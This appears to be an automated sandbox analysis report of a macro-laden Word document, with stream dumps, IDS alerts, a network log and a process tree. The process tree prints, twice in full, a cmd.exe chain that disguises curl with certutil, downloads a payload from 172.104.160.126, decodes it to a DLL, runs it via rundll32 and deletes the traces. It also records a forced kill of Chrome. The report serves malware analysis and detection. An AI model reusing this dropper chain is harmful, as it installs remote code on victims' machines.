    Data ASCII:I D = " { 6 3 9 4 0 D 1 7 - 7 B C 7 - 4 1 4 6 - B A 9 5 - 1 3 8 9 F F 7 0 2 C 5 8 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 5 D 7 6 E 4 7 9 6 1 8 9 A 1 8 9 A 1 8 9 A 1 8 9 A " . . D P B = " A A A 8 1 1 B 6 E 7 B 7 E 7 B 7 E 7 " . . G C = " 7 F 7 D C 4 E D 4 C 1 7 2 0 1 8 2 0 1 8 D F " . . . . [ H o s t E x t e n d e r I n f
    Data Raw:49 44 3d 22 7b 36 33 39 34 30 44 31 37 2d 37 42 43 37 2d 34 31 34 36 2d 42 41 39 35 2d 31 33 38 39 46 46 37 30 32 43 35 38 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
    General
    Stream Path:PROJECTwm
    CLSID:
    File Type:data
    Stream Size:41
    Entropy:3.0773844850752607
    Base64 Encoded:False
    Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
    Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
    General
    Stream Path:VBA/_VBA_PROJECT
    CLSID:
    File Type:data
    Stream Size:2976
    Entropy:4.617966626265468
    Base64 Encoded:False
    Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o
    Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
    General
    Stream Path:VBA/__SRP_0
    CLSID:
    File Type:data
    Stream Size:2782
    Entropy:3.5082390293182035
    Base64 Encoded:False
    Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ J . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . U . B - . . . . . . . . . . . . . .
    Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 80 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
    General
    Stream Path:VBA/__SRP_1
    CLSID:
    File Type:data
    Stream Size:174
    Entropy:1.6032810527820052
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 06 00 00 00 00 00 00 09 11 04 00 00 00 00
    General
    Stream Path:VBA/__SRP_2
    CLSID:
    File Type:data
    Stream Size:1224
    Entropy:2.0062113510689086
    Base64 Encoded:False
    Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:72 55 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 05 00 05 00 05 00 00 00 31 09 00 00 00 00 00 00 00 00 00 00 11 0c 00 00 00 00 00 00 00 00 00 00 51 0d 00 00 00 00 00 00 00 00
    General
    Stream Path:VBA/__SRP_3
    CLSID:
    File Type:data
    Stream Size:356
    Entropy:2.1693699541959686
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . 8 . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . ` . . . . 8 . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 04 60 00 00 e1 0d ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
    General
    Stream Path:VBA/dir
    CLSID:
    File Type:data
    Stream Size:514
    Entropy:6.2857106919283545
    Base64 Encoded:True
    Data ASCII:. . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . > h . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * \\ C . . . . . m A ! O f f i c g O D . f . i . c g . . ! G {
    Data Raw:01 fe b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 e3 3e ab 68 02 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
    TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
    2024-07-22T15:58:45.771195+0200TCP2029280ET MALWARE Observed Certificate Base64 Encoded Executable Inbound809949195172.104.160.126192.168.2.6
    2024-07-22T15:57:48.044440+0200TCP2029280ET MALWARE Observed Certificate Base64 Encoded Executable Inbound809949717172.104.160.126192.168.2.6
    TimestampSource PortDest PortSource IPDest IP
    Jul 22, 2024 15:57:37.290169954 CEST49673443192.168.2.6173.222.162.64
    Jul 22, 2024 15:57:37.290256977 CEST49674443192.168.2.6173.222.162.64
    Jul 22, 2024 15:57:37.618436098 CEST49672443192.168.2.6173.222.162.64
    Jul 22, 2024 15:57:46.593611002 CEST49714443192.168.2.640.126.31.69
    Jul 22, 2024 15:57:46.593657017 CEST4434971440.126.31.69192.168.2.6
    Jul 22, 2024 15:57:46.593781948 CEST49714443192.168.2.640.126.31.69
    Jul 22, 2024 15:57:46.593995094 CEST49714443192.168.2.640.126.31.69
    Jul 22, 2024 15:57:46.594027996 CEST4434971440.126.31.69192.168.2.6
    Jul 22, 2024 15:57:46.611236095 CEST49715443192.168.2.640.113.103.199
    Jul 22, 2024 15:57:46.611321926 CEST4434971540.113.103.199192.168.2.6
    Jul 22, 2024 15:57:46.611478090 CEST49715443192.168.2.640.113.103.199
    Jul 22, 2024 15:57:46.612370968 CEST49715443192.168.2.640.113.103.199
    Jul 22, 2024 15:57:46.612407923 CEST4434971540.113.103.199192.168.2.6
    Jul 22, 2024 15:57:46.689435959 CEST497178099192.168.2.6172.104.160.126
    Jul 22, 2024 15:57:46.695535898 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:46.695604086 CEST497178099192.168.2.6172.104.160.126
    Jul 22, 2024 15:57:46.718877077 CEST497178099192.168.2.6172.104.160.126
    Jul 22, 2024 15:57:46.723723888 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:46.899533033 CEST49673443192.168.2.6173.222.162.64
    Jul 22, 2024 15:57:46.899660110 CEST49674443192.168.2.6173.222.162.64
    Jul 22, 2024 15:57:47.227660894 CEST49672443192.168.2.6173.222.162.64
    Jul 22, 2024 15:57:47.923765898 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.924438000 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.924448967 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.924458027 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.924504995 CEST497178099192.168.2.6172.104.160.126
    Jul 22, 2024 15:57:47.924529076 CEST497178099192.168.2.6172.104.160.126
    Jul 22, 2024 15:57:47.925273895 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.925286055 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.925296068 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.925307035 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.925337076 CEST497178099192.168.2.6172.104.160.126
    Jul 22, 2024 15:57:47.925355911 CEST497178099192.168.2.6172.104.160.126
    Jul 22, 2024 15:57:47.926068068 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.926084042 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.926095009 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.926152945 CEST497178099192.168.2.6172.104.160.126
    Jul 22, 2024 15:57:47.926978111 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.927090883 CEST497178099192.168.2.6172.104.160.126
    Jul 22, 2024 15:57:47.942838907 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.942893028 CEST497178099192.168.2.6172.104.160.126
    Jul 22, 2024 15:57:47.943176985 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.943187952 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.943279028 CEST497178099192.168.2.6172.104.160.126
    Jul 22, 2024 15:57:47.943407059 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.944150925 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.944161892 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.944170952 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.944180012 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.944192886 CEST497178099192.168.2.6172.104.160.126
    Jul 22, 2024 15:57:47.944237947 CEST497178099192.168.2.6172.104.160.126
    Jul 22, 2024 15:57:47.945236921 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.945250034 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.945307970 CEST497178099192.168.2.6172.104.160.126
    Jul 22, 2024 15:57:47.946266890 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.946276903 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.946305037 CEST497178099192.168.2.6172.104.160.126
    Jul 22, 2024 15:57:47.947113991 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.947124004 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.947128057 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.947138071 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.947166920 CEST497178099192.168.2.6172.104.160.126
    Jul 22, 2024 15:57:47.948944092 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.948954105 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.949001074 CEST497178099192.168.2.6172.104.160.126
    Jul 22, 2024 15:57:47.950728893 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.950809002 CEST497178099192.168.2.6172.104.160.126
    Jul 22, 2024 15:57:47.951641083 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.951652050 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.951662064 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.951670885 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:47.951699018 CEST497178099192.168.2.6172.104.160.126
    Jul 22, 2024 15:57:47.951725960 CEST497178099192.168.2.6172.104.160.126
    Jul 22, 2024 15:57:48.044440031 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:48.044703007 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:48.044751883 CEST497178099192.168.2.6172.104.160.126
    Jul 22, 2024 15:57:48.130525112 CEST4434971440.126.31.69192.168.2.6
    Jul 22, 2024 15:57:48.130584002 CEST4434971540.113.103.199192.168.2.6
    Jul 22, 2024 15:57:48.130661011 CEST49715443192.168.2.640.113.103.199
    Jul 22, 2024 15:57:48.131546974 CEST49714443192.168.2.640.126.31.69
    Jul 22, 2024 15:57:48.133389950 CEST49715443192.168.2.640.113.103.199
    Jul 22, 2024 15:57:48.133418083 CEST4434971540.113.103.199192.168.2.6
    Jul 22, 2024 15:57:48.133835077 CEST4434971540.113.103.199192.168.2.6
    Jul 22, 2024 15:57:48.135431051 CEST49715443192.168.2.640.113.103.199
    Jul 22, 2024 15:57:48.135663033 CEST49715443192.168.2.640.113.103.199
    Jul 22, 2024 15:57:48.135675907 CEST4434971540.113.103.199192.168.2.6
    Jul 22, 2024 15:57:48.136001110 CEST49715443192.168.2.640.113.103.199
    Jul 22, 2024 15:57:48.144507885 CEST49714443192.168.2.640.126.31.69
    Jul 22, 2024 15:57:48.144521952 CEST4434971440.126.31.69192.168.2.6
    Jul 22, 2024 15:57:48.144990921 CEST4434971440.126.31.69192.168.2.6
    Jul 22, 2024 15:57:48.145420074 CEST49714443192.168.2.640.126.31.69
    Jul 22, 2024 15:57:48.145600080 CEST49714443192.168.2.640.126.31.69
    Jul 22, 2024 15:57:48.145652056 CEST4434971440.126.31.69192.168.2.6
    Jul 22, 2024 15:57:48.176534891 CEST4434971540.113.103.199192.168.2.6
    Jul 22, 2024 15:57:48.185066938 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:48.185121059 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:48.185154915 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:48.185205936 CEST497178099192.168.2.6172.104.160.126
    Jul 22, 2024 15:57:48.185282946 CEST809949717172.104.160.126192.168.2.6
    Jul 22, 2024 15:57:48.185316086 CEST809949717172.104.160.126192.168.2.6
    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    Jul 22, 2024 15:58:19.670135021 CEST192.168.2.61.1.1.10x960fStandard query (0)www.google.comA (IP address)IN (0x0001)false
    Jul 22, 2024 15:58:19.670432091 CEST192.168.2.61.1.1.10xf41fStandard query (0)www.google.com65IN (0x0001)false
    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Jul 22, 2024 15:57:57.744838953 CEST1.1.1.1192.168.2.60x58f8No error (0)templatesmetadata.office.nettemplatesmetadata.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
    Jul 22, 2024 15:58:19.677860022 CEST1.1.1.1192.168.2.60xf41fNo error (0)www.google.com65IN (0x0001)false
    Jul 22, 2024 15:58:19.678556919 CEST1.1.1.1192.168.2.60x960fNo error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
    Jul 22, 2024 15:58:46.119676113 CEST1.1.1.1192.168.2.60x3d19No error (0)templatesmetadata.office.nettemplatesmetadata.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false

    Click to jump to process

    Target ID:0
    Start time:09:57:38
    Start date:22/07/2024
    Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    Wow64 process (32bit):true
    Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
    Imagebase:0x740000
    File size:1'620'872 bytes
    MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:8
    Start time:09:57:44
    Start date:22/07/2024
    Path:C:\Windows\SysWOW64\cmd.exe
    Wow64 process (32bit):true
    Commandline:C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
    Imagebase:0x1c0000
    File size:236'544 bytes
    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:9
    Start time:09:57:44
    Start date:22/07/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff66e660000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:10
    Start time:09:57:44
    Start date:22/07/2024
    Path:C:\Windows\SysWOW64\xcopy.exe
    Wow64 process (32bit):true
    Commandline:xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
    Imagebase:0x430000
    File size:43'520 bytes
    MD5 hash:7E9B7CE496D09F70C072930940F9F02C
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:11
    Start time:09:57:44
    Start date:22/07/2024
    Path:C:\Windows\SysWOW64\certutil.exe
    Wow64 process (32bit):true
    Commandline:certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
    Imagebase:0x340000
    File size:1'277'440 bytes
    MD5 hash:0DDA4F16AE041578B4E250AE12E06EB1
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:12
    Start time:09:57:45
    Start date:22/07/2024
    Path:C:\Windows\SysWOW64\certutil.exe
    Wow64 process (32bit):true
    Commandline:certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
    Imagebase:0x340000
    File size:1'277'440 bytes
    MD5 hash:0DDA4F16AE041578B4E250AE12E06EB1
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:13
    Start time:09:57:45
    Start date:22/07/2024
    Path:C:\Users\user\AppData\Local\Temp\curl.exe
    Wow64 process (32bit):true
    Commandline:C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
    Imagebase:0x860000
    File size:470'528 bytes
    MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Antivirus matches:
    • Detection: 0%, ReversingLabs
    Reputation:moderate
    Has exited:true

    Target ID:14
    Start time:09:57:49
    Start date:22/07/2024
    Path:C:\Windows\SysWOW64\certutil.exe
    Wow64 process (32bit):true
    Commandline:certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
    Imagebase:0x340000
    File size:1'277'440 bytes
    MD5 hash:0DDA4F16AE041578B4E250AE12E06EB1
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:15
    Start time:09:57:49
    Start date:22/07/2024
    Path:C:\Windows\SysWOW64\rundll32.exe
    Wow64 process (32bit):true
    Commandline:rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
    Imagebase:0xfc0000
    File size:61'440 bytes
    MD5 hash:889B99C52A60DD49227C5E485A016679
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Target ID:16
    Start time:09:57:49
    Start date:22/07/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
    Imagebase:0x7ff7868b0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Target ID:17
    Start time:09:57:49
    Start date:22/07/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
    Imagebase:0x7ff7a6040000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:18
    Start time:09:57:49
    Start date:22/07/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff66e660000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:19
    Start time:09:57:49
    Start date:22/07/2024
    Path:C:\Windows\System32\taskkill.exe
    Wow64 process (32bit):false
    Commandline:taskkill /F /IM chrome.exe
    Imagebase:0x7ff6956e0000
    File size:101'376 bytes
    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:21
    Start time:09:58:13
    Start date:22/07/2024
    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Imagebase:0x7ff684c40000
    File size:3'242'272 bytes
    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:22
    Start time:09:58:13
    Start date:22/07/2024
    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1976,i,14189460158267219968,9438605418759963760,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Imagebase:0x7ff684c40000
    File size:3'242'272 bytes
    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:23
    Start time:09:58:15
    Start date:22/07/2024
    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386"
    Imagebase:0x7ff684c40000
    File size:3'242'272 bytes
    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:26
    Start time:09:58:33
    Start date:22/07/2024
    Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    Wow64 process (32bit):true
    Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
    Imagebase:0x740000
    File size:1'620'872 bytes
    MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:false

    Target ID:28
    Start time:09:58:42
    Start date:22/07/2024
    Path:C:\Windows\SysWOW64\cmd.exe
    Wow64 process (32bit):true
    Commandline:C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
    Imagebase:0x1c0000
    File size:236'544 bytes
    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:29
    Start time:09:58:42
    Start date:22/07/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff66e660000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
